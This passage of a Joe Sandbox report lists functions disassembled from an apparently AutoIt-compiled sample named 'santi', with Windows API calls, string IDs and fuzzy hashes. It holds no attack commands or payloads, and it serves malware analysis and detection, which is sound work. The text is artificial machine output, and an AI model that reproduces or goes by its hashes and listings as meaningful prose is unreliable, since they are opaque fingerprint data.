                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$DriveType
                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                • API String ID: 2907320926-4222207086
                                                                • Opcode ID: 0056e0d65c12b048d6e58ef764161f25eb407aa5ac7c177edc40d9f36c2d1aa7
                                                                • Instruction ID: 101a35dfa83f23ad1cbaff7207186debbe4a91fd9379afe0324d2350981382f4
                                                                • Opcode Fuzzy Hash: 0056e0d65c12b048d6e58ef764161f25eb407aa5ac7c177edc40d9f36c2d1aa7
                                                                • Instruction Fuzzy Hash: 0351C27024CB62AF8B13DF14E89286AB7A4FF94705B60481AF0479F6A1CB70DD55DB42
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                • API String ID: 1038674560-86951937
                                                                • Opcode ID: cfcad128a91001f3324d98d11a8230f0dfbada386f82a05468888b637c0e3a36
                                                                • Instruction ID: 1320904417c56a7de2b675ad1d69a32cd300ef338c4c08c05a1c84d320b00f9d
                                                                • Opcode Fuzzy Hash: cfcad128a91001f3324d98d11a8230f0dfbada386f82a05468888b637c0e3a36
                                                                • Instruction Fuzzy Hash: 14815D302902457BCB26AFA5DC43FFF7778AF15301F644029FD056A1C6E761DA26C690
                                                                APIs
                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0034C788
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0034C83E
                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 0034C859
                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0034CB15
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window
                                                                • String ID: 0
                                                                • API String ID: 2326795674-4108050209
                                                                • Opcode ID: 0916498ced4b08cfcd5ec61c3533a37ea5bfd4a0b483e119827107927cc70787
                                                                • Instruction ID: 9b6043057dbb7e52ef2627084f9db7c6bf7fcc129034daed1600539bee73e578
                                                                • Opcode Fuzzy Hash: 0916498ced4b08cfcd5ec61c3533a37ea5bfd4a0b483e119827107927cc70787
                                                                • Instruction Fuzzy Hash: 22F10370616300AFD7638F24C889BAABBE8FF49354F08552DF589DA2A1C774EC41CB91
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,0037DC00), ref: 00346449
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                • API String ID: 3964851224-45149045
                                                                • Opcode ID: 87e8def36b0ed17e0ea4804b0f9f2e627a3535620f519044813ce13c940ce6b8
                                                                • Instruction ID: 676e4b199101f1a4829476f11e85347fce11164d3e849553ba6c4a6ce8c894b0
                                                                • Opcode Fuzzy Hash: 87e8def36b0ed17e0ea4804b0f9f2e627a3535620f519044813ce13c940ce6b8
                                                                • Instruction Fuzzy Hash: 4DC1A2342142458BCF06EF10C552AAEB7D5AF9A744F024869F9965F3A2DB30FD4BCB42
                                                                APIs
                                                                • GetSysColor.USER32(00000012), ref: 0034D5AE
                                                                • SetTextColor.GDI32(?,?), ref: 0034D5B2
                                                                • GetSysColorBrush.USER32(0000000F), ref: 0034D5C8
                                                                • GetSysColor.USER32(0000000F), ref: 0034D5D3
                                                                • CreateSolidBrush.GDI32(?), ref: 0034D5D8
                                                                • GetSysColor.USER32(00000011), ref: 0034D5F0
                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0034D5FE
                                                                • SelectObject.GDI32(?,00000000), ref: 0034D60F
                                                                • SetBkColor.GDI32(?,00000000), ref: 0034D618
                                                                • SelectObject.GDI32(?,?), ref: 0034D625
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0034D644
                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0034D65B
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0034D670
                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0034D698
                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0034D6BF
                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0034D6DD
                                                                • DrawFocusRect.USER32(?,?), ref: 0034D6E8
                                                                • GetSysColor.USER32(00000011), ref: 0034D6F6
                                                                • SetTextColor.GDI32(?,00000000), ref: 0034D6FE
                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0034D712
                                                                • SelectObject.GDI32(?,0034D2A5), ref: 0034D729
                                                                • DeleteObject.GDI32(?), ref: 0034D734
                                                                • SelectObject.GDI32(?,?), ref: 0034D73A
                                                                • DeleteObject.GDI32(?), ref: 0034D73F
                                                                • SetTextColor.GDI32(?,?), ref: 0034D745
                                                                • SetBkColor.GDI32(?,?), ref: 0034D74F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 1996641542-0
                                                                • Opcode ID: 1b2a71a933caa807c031d57b04acc8fce322fded48245036a61fc1fa7327b157
                                                                • Instruction ID: 2e400a57d9f67cac21def4ffb846aabfda49e170bec7f10776e7ae064cb42a32
                                                                • Opcode Fuzzy Hash: 1b2a71a933caa807c031d57b04acc8fce322fded48245036a61fc1fa7327b157
                                                                • Instruction Fuzzy Hash: 89513E71E00218AFDF129FA4DC48EAE7BB9EF09324F118515FA15AB2A1D7B59A40CF50
                                                                APIs
                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0034B7B0
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0034B7C1
                                                                • CharNextW.USER32(0000014E), ref: 0034B7F0
                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0034B831
                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0034B847
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0034B858
                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0034B875
                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0034B8C7
                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0034B8DD
                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0034B90E
                                                                • _memset.LIBCMT ref: 0034B933
                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0034B97C
                                                                • _memset.LIBCMT ref: 0034B9DB
                                                                • SendMessageW.USER32 ref: 0034BA05
                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0034BA5D
                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 0034BB0A
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0034BB2C
                                                                • GetMenuItemInfoW.USER32(?), ref: 0034BB76
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0034BBA3
                                                                • DrawMenuBar.USER32(?), ref: 0034BBB2
                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0034BBDA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                • String ID: 0
                                                                • API String ID: 1073566785-4108050209
                                                                • Opcode ID: 820e0f3314d9ae63b3dde16c3a24b9cc1090753e64719f31e1b4fcabe71a52e6
                                                                • Instruction ID: 3b6b48a1875bf202a8a0d324399e28de8166b30d69054e73172b86e50d183628
                                                                • Opcode Fuzzy Hash: 820e0f3314d9ae63b3dde16c3a24b9cc1090753e64719f31e1b4fcabe71a52e6
                                                                • Instruction Fuzzy Hash: 93E17C71900218ABDB22DFA5CC84EEEBBBCEF05754F108156F919AE290D770EA41DF60
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Foreground
                                                                • String ID: ACTIVE$ALL$CLASS$H+9$HANDLE$INSTANCE$L+9$LAST$P+9$REGEXPCLASS$REGEXPTITLE$T+9$TITLE
                                                                • API String ID: 62970417-3468943737
                                                                • Opcode ID: 252eb9073daaa18e9a7ca1eba1cf1125c56aca6a091407ccef87a3215e5b98c4
                                                                • Instruction ID: 9b6eade974920d0b47cd124ebebc0ad6a90c190259e7add6703e74ffafbfcca8
                                                                • Opcode Fuzzy Hash: 252eb9073daaa18e9a7ca1eba1cf1125c56aca6a091407ccef87a3215e5b98c4
                                                                • Instruction Fuzzy Hash: 8FD1E530108646ABCB06EF11C881DABFBB4BF55340F404A29F856575B1DB70E9AECF91
                                                                APIs
                                                                • GetCursorPos.USER32(?), ref: 0034778A
                                                                • GetDesktopWindow.USER32 ref: 0034779F
                                                                • GetWindowRect.USER32(00000000), ref: 003477A6
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00347808
                                                                • DestroyWindow.USER32(?), ref: 00347834
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0034785D
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0034787B
                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003478A1
                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 003478B6
                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003478C9
                                                                • IsWindowVisible.USER32(?), ref: 003478E9
                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00347904
                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00347918
                                                                • GetWindowRect.USER32(?,?), ref: 00347930
                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00347956
                                                                • GetMonitorInfoW.USER32 ref: 00347970
                                                                • CopyRect.USER32(?,?), ref: 00347987
                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 003479F2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                • String ID: ($0$tooltips_class32
                                                                • API String ID: 698492251-4156429822
                                                                • Opcode ID: df606c9417c6c44e030706e5c56f5bf05521195bc03501fd43b164ce3e450932
                                                                • Instruction ID: cedb23006e73ac3aca95676741b99585567bfe1eaf86de942d4ef7021305a7fc
                                                                • Opcode Fuzzy Hash: df606c9417c6c44e030706e5c56f5bf05521195bc03501fd43b164ce3e450932
                                                                • Instruction Fuzzy Hash: 0EB1AD71618340AFDB05DF65C989B6ABBE9FF88310F40891DF5999B291DB70EC04CB92
                                                                APIs
                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00326CFB
                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00326D21
                                                                • _wcscpy.LIBCMT ref: 00326D4F
                                                                • _wcscmp.LIBCMT ref: 00326D5A
                                                                • _wcscat.LIBCMT ref: 00326D70
                                                                • _wcsstr.LIBCMT ref: 00326D7B
                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00326D97
                                                                • _wcscat.LIBCMT ref: 00326DE0
                                                                • _wcscat.LIBCMT ref: 00326DE7
                                                                • _wcsncpy.LIBCMT ref: 00326E12
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                • API String ID: 699586101-1459072770
                                                                • Opcode ID: dc662f48312d2ec399d55885d4c8f3b37c79b8c305bff8ed86924a43fbc89cd7
                                                                • Instruction ID: 8ecfa5a55b1caa775414e7d620a7d3156a7b775975d6add15d7db9abe0e65d0d
                                                                • Opcode Fuzzy Hash: dc662f48312d2ec399d55885d4c8f3b37c79b8c305bff8ed86924a43fbc89cd7
                                                                • Instruction Fuzzy Hash: 5E413472A01215BBEB07AB64DD47EBF77BCEF41310F140069F901AA1C2EB749A0196A2
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002FA939
                                                                • GetSystemMetrics.USER32(00000007), ref: 002FA941
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002FA96C
                                                                • GetSystemMetrics.USER32(00000008), ref: 002FA974
                                                                • GetSystemMetrics.USER32(00000004), ref: 002FA999
                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002FA9B6
                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 002FA9C6
                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002FA9F9
                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002FAA0D
                                                                • GetClientRect.USER32(00000000,000000FF), ref: 002FAA2B
                                                                • GetStockObject.GDI32(00000011), ref: 002FAA47
                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 002FAA52
                                                                  • Part of subcall function 002FB63C: GetCursorPos.USER32(000000FF), ref: 002FB64F
                                                                  • Part of subcall function 002FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 002FB66C
                                                                  • Part of subcall function 002FB63C: GetAsyncKeyState.USER32(00000001), ref: 002FB691
                                                                  • Part of subcall function 002FB63C: GetAsyncKeyState.USER32(00000002), ref: 002FB69F
                                                                • SetTimer.USER32(00000000,00000000,00000028,002FAB87), ref: 002FAA79
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                • String ID: AutoIt v3 GUI
                                                                • API String ID: 1458621304-248962490
                                                                • Opcode ID: ae3be249b7cd00b60c89b94735675ac7582ddbbeb35526c350620d74542d732b
                                                                • Instruction ID: 3feeadc805357da26fe97555b1f8fa75384383cf36d6fb1edfa2a55f98f2d424
                                                                • Opcode Fuzzy Hash: ae3be249b7cd00b60c89b94735675ac7582ddbbeb35526c350620d74542d732b
                                                                • Instruction Fuzzy Hash: 41B19071A1020A9FDB15DFA8CC45BAEBBB8FB08355F154129FA15E72A0DBB0D850CF51
                                                                APIs
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00343735
                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0037DC00,00000000,?,00000000,?,?), ref: 003437A3
                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003437EB
                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00343874
                                                                • RegCloseKey.ADVAPI32(?), ref: 00343B94
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00343BA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                • API String ID: 536824911-966354055
                                                                • Opcode ID: 484e7f077ef3569b6cd70565c6b76d25bc60c42e71a165e662670ab4355914d9
                                                                • Instruction ID: d25cc184192006cac1d2a9534ff7971b7edfb63e2b6a64d2a42f7d2b6f4f8fef
                                                                • Opcode Fuzzy Hash: 484e7f077ef3569b6cd70565c6b76d25bc60c42e71a165e662670ab4355914d9
                                                                • Instruction Fuzzy Hash: BB0277752046019FCB15EF25C891A2AB7E9FF88720F05845DF98A9B3A2CB30ED51CF81
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 00346C56
                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00346D16
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharMessageSendUpper
                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                • API String ID: 3974292440-719923060
                                                                • Opcode ID: 3c750173cc9d7870eac1ff12fd0909a7532f65f556dacdbf1a87f18d504ecc2b
                                                                • Instruction ID: 740d2e9277fa85509d16586a45bc42e060908266ea6b5167aa25ce3122e3dade
                                                                • Opcode Fuzzy Hash: 3c750173cc9d7870eac1ff12fd0909a7532f65f556dacdbf1a87f18d504ecc2b
                                                                • Instruction Fuzzy Hash: 91A1AD342142459BCB16EF20C952A7AB3E5BF86354F11486DB9969F3D2DB30FC1ACB42
                                                                APIs
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0031CF91
                                                                • __swprintf.LIBCMT ref: 0031D032
                                                                • _wcscmp.LIBCMT ref: 0031D045
                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0031D09A
                                                                • _wcscmp.LIBCMT ref: 0031D0D6
                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0031D10D
                                                                • GetDlgCtrlID.USER32(?), ref: 0031D15F
                                                                • GetWindowRect.USER32(?,?), ref: 0031D195
                                                                • GetParent.USER32(?), ref: 0031D1B3
                                                                • ScreenToClient.USER32(00000000), ref: 0031D1BA
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0031D234
                                                                • _wcscmp.LIBCMT ref: 0031D248
                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0031D26E
                                                                • _wcscmp.LIBCMT ref: 0031D282
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                • String ID: %s%u
                                                                • API String ID: 3119225716-679674701
                                                                • Opcode ID: d306841b3d70b9a0201de7a2d5f2a0ae82db70b8cf21e325312e558610ef50da
                                                                • Instruction ID: 36a657b0527c0221c4af6e5be648a8d41489120e2c5ba8b5a98e8f10d1755bf3
                                                                • Opcode Fuzzy Hash: d306841b3d70b9a0201de7a2d5f2a0ae82db70b8cf21e325312e558610ef50da
                                                                • Instruction Fuzzy Hash: 53A1D231604306AFD71ADF64C884FEAB7A8FF49354F008929F969D6190D730EA96CB91
                                                                APIs
                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0031D8EB
                                                                • _wcscmp.LIBCMT ref: 0031D8FC
                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0031D924
                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0031D941
                                                                • _wcscmp.LIBCMT ref: 0031D95F
                                                                • _wcsstr.LIBCMT ref: 0031D970
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0031D9A8
                                                                • _wcscmp.LIBCMT ref: 0031D9B8
                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0031D9DF
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0031DA28
                                                                • _wcscmp.LIBCMT ref: 0031DA38
                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0031DA60
                                                                • GetWindowRect.USER32(00000004,?), ref: 0031DAC9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
